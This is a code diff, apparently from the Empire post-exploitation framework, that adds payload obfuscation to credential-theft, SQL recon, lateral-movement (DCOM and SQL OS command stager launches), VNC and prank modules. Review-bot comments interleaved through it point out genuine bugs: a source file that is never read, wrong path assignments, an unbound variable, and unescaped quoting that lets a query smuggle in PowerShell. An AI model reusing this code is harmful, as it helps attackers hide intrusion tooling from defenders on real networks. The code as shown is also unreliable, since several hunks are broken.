diff --git a/lib/modules/powershell/collection/get_indexed_item.py b/lib/modules/powershell/collection/get_indexed_item.py index 2eb82af..3039b13 100644 --- a/lib/modules/powershell/collection/get_indexed_item.py +++ b/lib/modules/powershell/collection/get_indexed_item.py @@ -55,7 +55,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1" diff --git a/lib/modules/powershell/collection/get_sql_column_sample_data.py b/lib/modules/powershell/collection/get_sql_column_sample_data.py index cb73c07..7f9d007 100644 --- a/lib/modules/powershell/collection/get_sql_column_sample_data.py +++ b/lib/modules/powershell/collection/get_sql_column_sample_data.py @@ -67,7 +67,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] 
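Review bot: `generate()` in get_indexed_item.py gains `obfuscate` and `obfuscationCommand` with no docstring, and this file has no other hunk in the diff, so the two arguments appear to be accepted and then ignored. A short docstring would make the contract explicit, for example `"""Build the module's PowerShell script text; obfuscate/obfuscationCommand are accepted for interface parity and not applied in this module."""`; otherwise the body should honour the flag the way the sibling modules do. The rest of generate() lies outside the hunk, so this needs confirming against the full file. The same undocumented signature change is repeated in every other file of this diff.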
@@ -78,34 +78,42 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLColumnSampleData.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + script = moduleSource.replace("module_source", "obfuscated_module_source") try: - with open(moduleSource, 'r') as source: - script = source.read() + f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand) + auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(auxModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print helpers.color("[!] 
Could not read additional module source path at: " + str(auxModuleSource)) - script += " Get-SQLInstanceDomain " + scriptEnd = " Get-SQLInstanceDomain " if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password - script += " | " - script += " Get-SQLColumnSampleData" + scriptEnd += " -Password "+password + scriptEnd += " | " + scriptEnd += " Get-SQLColumnSampleData" if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password if instance != "" and not check_all: - script += " -Instance "+instance + scriptEnd += " -Instance "+instance if no_defaults: - script += " -NoDefaults " + scriptEnd += " -NoDefaults " + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_query.py b/lib/modules/powershell/collection/get_sql_query.py index 551cc2a..bdf45f5 100644 --- a/lib/modules/powershell/collection/get_sql_query.py +++ b/lib/modules/powershell/collection/get_sql_query.py @@ -60,7 +60,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] @@ -70,6 +70,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() 
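Review bot: In the get_sql_column_sample_data.py hunk the module body is never loaded: the `with open(...)`/`source.read()` pair is replaced by a bare `f = open(moduleSource, 'r')` whose handle is neither read nor closed in the visible lines, so `script` never receives the module source. In the `if obfuscate:` branch the rewritten path is assigned to `script` rather than `moduleSource`, so the original file is still the one opened; the sibling hunks assign to `moduleSource`. Under `check_all`, `auxModuleSource` is derived from `moduleSource.replace(...)`, which points it at the main module's file instead of Get-SQLInstanceDomain.ps1; the same line appears in the get_sql_server_login_default_pw.py and get_sql_server_info.py hunks. The fence shows the corrected assignments and the restored read; generate() begins outside this hunk.

```python
        if obfuscate:
            # ... unchanged: helpers.obfuscate_module(moduleSource=moduleSource, ...) ...
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as source:
                script = source.read()
        # ... unchanged: except branch, check_all test, auxModuleSource assignment ...
            if obfuscate:
                # ... unchanged: helpers.obfuscate_module(moduleSource=auxModuleSource, ...) ...
                auxModuleSource = auxModuleSource.replace("module_source", "obfuscated_module_source")
        # ... unchanged: aux read and scriptEnd construction ...
```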
@@ -77,13 +80,15 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" - script += " Get-SQLQuery" + scriptEnd = " Get-SQLQuery" if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password if instance != "": - script += " -Instance "+instance - script += " -Query "+"\'"+query+"\'" - + scriptEnd += " -Instance "+instance + scriptEnd += " -Query "+"\'"+query+"\'" + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/sessiongopher.py b/lib/modules/powershell/credentials/sessiongopher.py index 5be7356..c7acc1b 100644 --- a/lib/modules/powershell/credentials/sessiongopher.py +++ b/lib/modules/powershell/credentials/sessiongopher.py @@ -105,12 +105,15 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-SessionGopher.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: @@ -121,7 +124,7 @@ class Module: f.close() script = moduleCode - script += "Invoke-SessionGopher" + scriptEnd = "Invoke-SessionGopher" # add any arguments to the end execution of the script for option,values in self.options.iteritems(): 
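Review bot: In the get_sql_query.py hunk the `-Query` value is wrapped in single quotes without escaping, so a query that itself contains a single quote (ordinary in SQL string literals) ends the PowerShell string early and the remainder is parsed as further PowerShell. Doubling embedded quotes keeps it one literal: `scriptEnd += " -Query '" + query.replace("'", "''") + "'"`. The `-Username`, `-Password` and `-Instance` values in this hunk are appended with no quoting at all. The same pattern recurs in the get_sql_column_sample_data.py, get_sql_server_login_default_pw.py, get_sql_instance_domain.py and get_sql_server_info.py hunks, so a small shared quoting helper would cover all of them. generate() starts outside this hunk.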
@@ -129,8 +132,10 @@ class Module: if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch - script += " -" + str(option) + scriptEnd += " -" + str(option) else: - script += " -" + str(option) + " " + str(values['Value']) - + scriptEnd += " -" + str(option) + " " + str(values['Value']) + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_dcom.py b/lib/modules/powershell/lateral_movement/invoke_dcom.py index 3b99422..ba766c3 100644 --- a/lib/modules/powershell/lateral_movement/invoke_dcom.py +++ b/lib/modules/powershell/lateral_movement/invoke_dcom.py @@ -83,7 +83,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] method = self.options['Method']['Value'] @@ -93,7 +93,9 @@ class Module: proxyCreds = self.options['ProxyCreds']['Value'] moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-DCOM.ps1" - + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: 
@@ -124,9 +126,11 @@ class Module: else: stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher - script += "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd) + scriptEnd = "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd) - script += "| Out-String | %{$_ + \"`n\"};" - + scriptEnd += "| Out-String | %{$_ + \"`n\"};" + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py index 8478b8d..316cae5 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py +++ b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py @@ -74,7 +74,7 @@ class Module: option, value = param if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): credID = self.options["CredID"]['Value'] if credID != "": @@ -101,6 +101,9 @@ class Module: moduleSource = self.mainMenu.installPath + "data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1" moduleCode = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: moduleCode = source.read() 
@@ -122,10 +125,13 @@ class Module: command = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher - script += "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command) + scriptEnd = "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command) if username != "": - script += " -UserName "+username + scriptEnd += " -UserName "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/management/vnc.py b/lib/modules/powershell/management/vnc.py index dfd2863..e3ef899 100644 --- a/lib/modules/powershell/management/vnc.py +++ b/lib/modules/powershell/management/vnc.py @@ -71,13 +71,15 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in th Invoke-Vnc.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-Vnc.ps1" - + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: 
@@ -89,14 +91,17 @@ class Module: script = moduleCode - script += "\nInvoke-Vnc" + scriptEnd = "\nInvoke-Vnc" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch - script += " -" + str(option) + scriptEnd += " -" + str(option) else: - script += " -" + str(option) + " " + str(values['Value']) + scriptEnd += " -" + str(option) + " " + str(values['Value']) + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py index 1b92afc..948c69a 100644 --- a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py +++ b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py @@ -62,7 +62,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] @@ -71,6 +71,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() 
@@ -80,19 +83,25 @@ class Module: if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand) + auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(auxModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource)) - script += " Get-SQLInstanceDomain " + scriptEnd = " Get-SQLInstanceDomain " if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password - script += " | Select Instance | " - script += " Get-SQLServerLoginDefaultPw" + scriptEnd += " -Password "+password + scriptEnd += " | Select Instance | " + scriptEnd += " Get-SQLServerLoginDefaultPw" if instance != "" and not check_all: - script += " -Instance "+instance + scriptEnd += " -Instance "+instance + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script \ No newline at end of file diff --git a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py index 08ed64e..1939a24 100644 --- a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py +++ b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py @@ -78,7 +78,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): # the PowerShell script itself, with the command to invoke # for execution appended to the end. Scripts should output 
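Review bot: In the get_sql_server_login_default_pw.py hunk `scriptEnd` looks unbound when `check_all` is false. Its only plain assignment, `scriptEnd = " Get-SQLInstanceDomain "`, appears to belong to the `if check_all:` branch (indentation is not recoverable here, but the later `and not check_all` test implies it), while `scriptEnd += " Get-SQLServerLoginDefaultPw"` runs unconditionally. Before the change these were all `script +=` on an already-initialised variable, so the non-`check_all` path would now raise UnboundLocalError. Initialising `scriptEnd = ""` before `if check_all:` and changing the branch line to `scriptEnd += " Get-SQLInstanceDomain "` avoids that. The get_sql_column_sample_data.py and get_sql_server_info.py hunks build `scriptEnd` the same way.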
@@ -91,6 +91,9 @@ class Module: # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: @@ -101,7 +104,7 @@ class Module: f.close() script = moduleCode - script += "Start-TCPMonitor" + scriptEnd = "Start-TCPMonitor" # add any arguments to the end execution of the script for option,values in self.options.iteritems(): @@ -109,8 +112,10 @@ class Module: if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch - script += " -" + str(option) + scriptEnd += " -" + str(option) else: - script += " -" + str(option) + " " + str(values['Value']) - + scriptEnd += " -" + str(option) + " " + str(values['Value']) + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py index 5ac139d..dbf5362 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py @@ -79,7 +79,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): domainController = self.options['DomainController']['Value'] computerName = self.options['ComputerName']['Value'] 
@@ -92,6 +92,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() @@ -99,20 +102,22 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" - script += " Get-SQLInstanceDomain" + scriptEnd = " Get-SQLInstanceDomain" if username != "": - script += " -Username " + username + scriptEnd += " -Username " + username if password != "": - script += " -Password " + password + scriptEnd += " -Password " + password if domainController != "": - script += " -DomainController "+domainController + scriptEnd += " -DomainController "+domainController if computerName != "": - script += " -ComputerName "+computerName + scriptEnd += " -ComputerName "+computerName if domainAccount != "": - script += " -DomainAccount "+domainAccount + scriptEnd += " -DomainAccount "+domainAccount if checkMgmt.lower() != "false": - script += " -CheckMgmt" + scriptEnd += " -CheckMgmt" if udpTimeOut != "": - script += " -UDPTimeOut "+udpTimeOut - + scriptEnd += " -UDPTimeOut "+udpTimeOut + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index e65c388..83c9bf9 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py 
@@ -60,7 +60,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] @@ -69,6 +69,9 @@ class Module: # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLServerInfo.ps1" script = "" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() 
@@ -78,24 +81,29 @@ class Module: if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand) + auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(auxModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource)) - script += " Get-SQLInstanceDomain " + scriptEnd = " Get-SQLInstanceDomain " if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password - script += " | " - script += " Get-SQLServerInfo" + scriptEnd += " -Password "+password + scriptEnd += " | " + scriptEnd += " Get-SQLServerInfo" if username != "": - script += " -Username "+username + scriptEnd += " -Username "+username if password != "": - script += " -Password "+password + scriptEnd += " -Password "+password if instance != "" and not check_all: - script += " -Instance "+instance - + scriptEnd += " -Instance "+instance + if obfuscate: + scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/get_schwifty.py b/lib/modules/powershell/trollsploit/get_schwifty.py index 70496f6..90abefb 100644 --- a/lib/modules/powershell/trollsploit/get_schwifty.py +++ b/lib/modules/powershell/trollsploit/get_schwifty.py @@ -56,7 +56,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): script = """ Function Get-Schwifty 
@@ -98,5 +98,6 @@ Function Get-Schwifty script += " -" + str(option) + " " + str(values['Value']) script += "; 'Agent is getting schwifty!'" - + if obfuscate: + script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wlmdr.py b/lib/modules/powershell/trollsploit/wlmdr.py index 65d9ca4..62d76a9 100644 --- a/lib/modules/powershell/trollsploit/wlmdr.py +++ b/lib/modules/powershell/trollsploit/wlmdr.py @@ -65,7 +65,7 @@ class Module: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-Wlrmdr { @@ -107,5 +107,6 @@ Invoke-Wlrmdr""" script += " -" + str(option) else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" - + if obfuscate: + script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) return script